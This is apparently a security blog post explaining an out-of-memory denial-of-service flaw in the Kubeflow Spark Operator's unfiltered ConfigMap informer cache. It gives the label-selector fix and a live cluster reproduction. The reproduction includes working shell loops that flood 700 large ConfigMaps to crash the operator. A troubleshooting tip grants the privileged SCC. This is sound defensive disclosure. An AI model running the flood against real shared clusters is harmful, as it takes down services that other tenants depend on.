Protect your Kubernetes Operator from OOMKill

If you've ever worked with Kubernetes, you've probably heard of operators, those helpful programs that watch over your cluster and manage complex applications automatically. They are highly effective. But they have a quiet vulnerability that's easy to miss during code review, and it can let any regular user crash your operator completely. While investigating the Spark Operator, we identified the same pattern in several other controller-runtime operators and worked with upstream maintainers to fix them. Let's walk through it.

First, what's an informer cache?

When your operator needs to know about resources in the cluster (like Pods or ConfigMaps), it doesn't query the Kubernetes API every single time. That would be slow and expensive. Instead, it sets up something called an informer.

The informer performs a full LIST operation of every matching object at startup, then opens a persistent WATCH connection to receive changes in real time. The informer deserializes every object it finds into a full Go struct and stores it in an in-memory cache. Think of it as a live subscriber that keeps a local copy of that data.

Here's the catch: if you set up an informer without filters, it catches every single object of that type across the entire cluster, as illustrated in Figure 1.

Informer Cache Concept — Figure 1: Informer cache mechanism caching all cluster resources indiscriminately when no filters are applied.

The vulnerability: An unfiltered cache

In the Kubeflow Spark Operator, the cache was configured like this:

ByObject: map[client.Object]cache.ByObject{
    &corev1.Pod{}: {
        Label: labels.SelectorFromSet(labels.Set{
            "sparkoperator.k8s.io/launched-by-spark-operator": "true",
        }),
    },
    &corev1.ConfigMap{}: {},  // ← only caches Pods with a specific label
                               // ← but caches ALL ConfigMaps, everywhere
}

The operator protected pods with a label filter, but ConfigMaps were left unfiltered. The empty {} configuration directs the informer to cache all objects.

How an attacker exploits this

Here's the scary part: an attacker does not need special permissions to execute this exploit. Any user with the edit ClusterRole—the standard role granted to developers and data scientists in multi-tenant clusters—can create a ConfigMap. That's all it takes to trash your operator.

The progression of this memory saturation and subsequent pod failure is mapped out in Figure 2.

OOMKill Attack Flow — Figure 2: Out-of-memory termination sequence caused by memory growth from unfiltered resource deserialization.

The math is simple: 700 ConfigMaps at 900 KB each equals approximately 630 MB of raw data. However, the informer does not store raw YAML. Instead, it deserializes each object into a typed Go struct (corev1.ConfigMap) with map headers, string headers, and pointer indirection. The real memory footprint exceeds the raw data size. With a 512 MiB memory limit on the operator, the process terminates. It restarts, attempts to relist everything, crashes again, and enters a CrashLoopBackOff status. Your operator is now completely out of commission, resulting in a denial-of-service condition with no special tools required.

The solution

Resolving this memory exhaustion vulnerability requires a systematic engineering approach. Figure 3 outlines the four primary phases of the cache remediation process.

Fix Steps Overview — Figure 3: Architectural phases of the step-by-step informer cache remediation sequence.

Step 1: Filter the cache

This solution uses the same pattern that the operator already applies to pods. The updated configuration instructs the informer to cache only the objects that contain a specific label.

// Before (vulnerable) — caches EVERY ConfigMap in the cluster:
&corev1.ConfigMap{}: {},
// After (fixed) — only caches ConfigMaps your operator created:
&corev1.ConfigMap{}: {
    Label: labels.SelectorFromSet(labels.Set{
        "sparkoperator.k8s.io/created-by-spark-operator": "true",
    }),
},

By refining the cache scope, the informer selectively isolates objects in memory, as diagrammed in Figure 4.

The label filter in action, only operator-owned ConfigMaps enter memory — Figure 4: The label filter in action, where only operator-owned ConfigMaps enter memory.

Now when an attacker floods the cluster with unlabeled ConfigMaps, the informer ignores them. These resources never enter your operator's memory footprint.

Step 2: Label your own ConfigMaps

The operator creates Prometheus monitoring ConfigMaps for Spark applications. Because the cache now filters by label, those ConfigMaps also require the label; otherwise, your operator cannot detect its own objects.

return &corev1.ConfigMap{
    ObjectMeta: metav1.ObjectMeta{
        Name:      prometheusConfigMapName,
        Namespace: app.Namespace,
        Labels: map[string]string{
            "sparkoperator.k8s.io/created-by-spark-operator": "true",
        },
    },
    Data: configMapData,
}

Step 3: Handle the resource upgrade path

This scenario is where most engineers encounter issues. When you deploy the patched operator on a cluster that already has ConfigMaps from the old version, those existing objects lack a label. The filtered cache cannot detect these objects. So this awkward thing happens:

client.Get() returns NotFound (because the cache cannot detect the unlabeled object).
client.Create() returns AlreadyExists because the resource is already present in the API server.

To bypass this limitation, you can apply a merge patch. A merge patch does not require a resourceVersion field like a standard update operation does, and it applies the label without overwriting other configurations on the object:

if errors.IsAlreadyExists(createErr) {
    base := &corev1.ConfigMap{ /* just name + namespace */ }
    desired := base.DeepCopy()
    desired.Labels = map[string]string{
        "sparkoperator.k8s.io/created-by-spark-operator": "true",
    }
    desired.Data = configMap.Data
    return c.Patch(ctx, desired, client.MergeFrom(base))
}

This fallback mechanism handles resource reconciliation during deployment transitions without breaking state, as detailed in Figure 5.

Upgrade-path — Figure 5: Logical execution flow for evaluating and patching unlabeled pre-existing resources during upgrades.

Step 4: Propagate labels during resource updates

For ConfigMaps that are already visible in the cache, ensure the operator writes the label back during an update. This practice guards against edge cases where a label might be missing:

cm.Data = configMap.Data
if cm.Labels == nil {
    cm.Labels = map[string]string{}
}
cm.Labels["sparkoperator.k8s.io/created-by-spark-operator"] = "true"
return c.Update(ctx, cm)

Proving it on a real cluster

While unit tests are great, observing system behavior directly on a live cluster provides definitive validation. Here's the full walkthrough.

The test consists of two phases: first, you confirm the vulnerability with the unpatched operator, and then you confirm the fix with the patched operator. The 700 flooded ConfigMaps remain in the cluster between phases, allowing you to test the operator against a realistic worst-case scenario. The sequential verification lifecycle across your environment is mapped in Figure 6.

OpenShift Cluster Test Flow — Figure 6: Live validation lifecycle for evaluating operator performance against multi-tenant resource flooding.

Step 1: Log in to the cluster and verify access

oc login <your-cluster-url> --username cluster-admin --password <password>
oc whoami

You need cluster-admin privileges to deploy the operator and create namespaces. If oc whoami returns your username, the authentication is successful.

Step 2: Deploy the unpatched operator

Deploy the stock operator image (quay.io/opendatahub/spark-operator:v2.4.0) using Kustomize manifests. This is the vulnerable version with no label filter on the ConfigMap cache.

oc apply -k config/default/ --server-side=true
oc get pods -n spark-operator -w

The --server-side=true flag avoids field ownership conflicts with large custom resource definitions. Wait until the pod shows Running before proceeding.

Step 3: Record the operator's baseline memory usage

Before flooding the cluster, capture the operator's normal memory usage to establish a healthy baseline.

oc adm top pod -n spark-operator

NAME                                        CPU(cores)   MEMORY(bytes)
spark-operator-controller-bb745cb-qj6vj     1m           36Mi

Note the approximately 36 MiB value. That's your healthy reference point.

Step 4: Create 10 test namespaces

for i in $(seq 1 10); do oc create ns oom-test-$i; done

Spreading ConfigMaps across multiple namespaces simulates a real multi-tenant cluster where different teams create their own resources.

This loop executes the oc create ns oom-test-1 through oc create ns oom-test-10 commands.

Step 5: Generate the text-based attack payload

dd if=/dev/urandom bs=1024 count=900 2>/dev/null | base64 > /tmp/payload.txt
truncate -s 921600 /tmp/payload.txt
ls -lh /tmp/payload.txt

What's happening here: The dd utility reads 900 KB of random bytes from the system, base64 converts the data into plaintext because ConfigMaps cannot store raw binary data, and truncate trims the file to exactly 900 KB because base64 encoding inflates the file size by approximately 33%.

Step 6: Flood 700 ConfigMaps

for i in $(seq 1 700); do
  ns="oom-test-$(( (i % 10) + 1 ))"
  oc create configmap "oom-payload-$i" --from-file=data=/tmp/payload.txt -n "$ns" 2>/dev/null &
  [ $((i % 5)) -eq 0 ] && wait
done
wait

The modulo operation (% 10) distributes the ConfigMaps evenly across the 10 namespaces. The & operator runs each creation command in the background to increase execution speed, and the wait command every five iterations prevents the process from overwhelming the API server. Verify that the creation succeeded:

oc get configmaps -A | grep oom-payload | wc -l
# Expected: 700

Step 7: Watch the operator termination

oc get pods -n spark-operator -w

Within 30 to 60 seconds, the terminal displays the following status changes:

spark-operator-controller-bb745cb-qj6vj   0/1   OOMKilled          5   16h
spark-operator-controller-bb745cb-qj6vj   0/1   CrashLoopBackOff   5   16h
spark-operator-controller-bb745cb-qj6vj   0/1   OOMKilled          6   16h

Confirm the error state by running the following command:

oc describe pod -n spark-operator -l app.kubernetes.io/component=controller | grep -A3 "Last State"

Last State:  Terminated
Reason:    OOMKilled
Exit Code: 137

Vulnerability confirmed. The unfiltered informer cached 630 MB of data and exceeded the 512 MiB memory limit, which caused Kubernetes to terminate the process.

Step 8: Build and deploy the patched operator image

Clone the upstream fix branch, build your own image, and deploy it. The 700 flooded ConfigMaps are still sitting in the cluster. The patched operator must withstand this traffic.

# Build from the upstream fix branch (kubeflow/spark-operator#2878)
git clone https://github.com/kubeflow/spark-operator.git
cd spark-operator && git checkout <fix-branch>
docker buildx build --platform linux/amd64 -t <your-registry>/spark-operator-controller:oom-fix --push .

The --platform linux/amd64 flag is required if you are building the image on Apple Silicon hardware; without it, the container image will not run on an x86 cluster. After pushing the image, update the running deployment:

export IMAGE=<your-registry>/spark-operator-controller:oom-fix
oc set image deployment/spark-operator-controller controller=$IMAGE -n spark-operator
oc rollout status deployment/spark-operator-controller -n spark-operator

Replace <your-registry> with your own container registry (for example, quay.io/your-username) and <fix-branch> with the branch name from the upstream pull request. The oc rollout status command blocks until the new pod is fully operational, indicating exactly when it is ready for testing.

Step 9: Verify the fix holds

oc get pods -n spark-operator

NAME                                        READY   STATUS    RESTARTS   AGE
spark-operator-controller-cdb487b68-sdfnn   1/1     Running   0          71s

oc adm top pod -n spark-operator

NAME                                        CPU(cores)   MEMORY(bytes)
spark-operator-controller-cdb487b68-sdfnn   1m           14Mi

A memory usage of 14 MiB matches the baseline, resulting in zero restarts. The label filter is doing its job. All 700 unlabeled ConfigMaps remain invisible to the informer cache.

Metric	Unpatched	Patched
Status	`OOMKilled` → `CrashLoopBackOff`	`Running`, 0 restarts
Memory	Exceeded 512 MiB (exit code 137)	14 MiB, flat
700 flooded ConfigMaps	All cached	Ignored

Step 10: Cleanup

for i in $(seq 1 10); do oc delete ns oom-test-$i --wait=false; done
oc delete -k config/default/
rm -f /tmp/payload.txt

The --wait=false flag kicks off namespace deletion in the background without blocking your terminal.

Common issues and troubleshooting

Use the following troubleshooting steps to resolve configuration and environment issues encountered during deployment.

SCC errors on pod startup

OpenShift's Security Context Constraints are stricter than vanilla Kubernetes. If pods fail to start due to an SCC validation error, grant the privileged SCC to the operator's service accounts:

oc adm policy add-scc-to-user privileged -z spark-operator-controller -n spark-operator
oc adm policy add-scc-to-user privileged -z spark-operator-webhook -n spark-operator

Architecture mismatch (Apple Silicon)

If you build the image on an M1 or M2 Mac and the target cluster utilizes an x86 architecture, the deployment returns a no image found for architecture "amd64" error. To resolve this issue, rebuild the image using the following command:

docker buildx build --platform linux/amd64 -t $IMAGE --push .

Image pull errors from quay.io

New quay.io repositories are private by default. Navigate to your repository's Settings page and select Make Public before the cluster attempts to pull the image.

Operator does not terminate with an OOMKilled error

If the operator is scoped to specific namespaces using the --namespaces flag in the deployment, it will not watch the oom-test-* namespaces and will not cache the flooded ConfigMaps. Check the deployment arguments: An empty --namespaces= flag indicates a cluster-wide scope, which this test requires.

Tips and best practices

Implement the following design patterns and testing strategies to safeguard your operators from cache-based memory exhaustion.

Always use label selectors on informer caches. If your operator creates ConfigMaps, Services, or other common objects, add a label and filter the cache by that label.
Audit all entries in ByObject. Any entry with {}, which indicates an empty configuration, represents an unfiltered cluster-wide informer. Ask: Does this operator require a cache for every object of this type?
Use a merge patch for resource upgrade paths. When you add label filtering to an existing deployment, pre-existing objects will not contain the label. Use client.Patch with MergeFrom to add labels without requiring a resourceVersion field.
Test with realistic data volumes. The attack requires only approximately 700 ConfigMaps at 900 KB each—well within what a standard user can create. Test your deployments at this scale.

Wrap up

An unfiltered informer cache in a controller-runtime operator introduces a vulnerability to out-of-memory (OOM) terminations via ConfigMap flooding. Mitigating this risk involves the following steps:

Add a label selector to the ByObject cache configuration.
Label operator-created ConfigMaps.
Manage the resource upgrade path using a merge patch for pre-existing objects.
Propagate labels during resource updates.

This vulnerability is not a theoretical problem. After resolving the issue in the Spark Operator, we audited other controller-runtime operators and discovered the same pattern. The upstream fix landed at kubeflow/spark-operator/pull/2878. This configuration pattern is systemic across the controller-runtime ecosystem because ByObject defaults to caching all objects when no selector is specified. The vulnerability applies to any high-volume resource type, including ConfigMaps, secrets, services, and pods. If you maintain a controller-runtime operator, audit your cache configuration to protect your cluster.

Learn more

Explore the following resources for more details on cache configuration, upstream fixes, and platform security:

Kubeflow Spark Operator: The upstream project
kubeflow/spark-operator#2878: The upstream fix for the ConfigMap cache vulnerability.
controller-runtime Cache Options: Official documentation for cache configuration.
Kubernetes Informers: Documentation explaining the watch and cache mechanism.
OpenShift Security Context Constraints: Understanding SCC on OpenShift.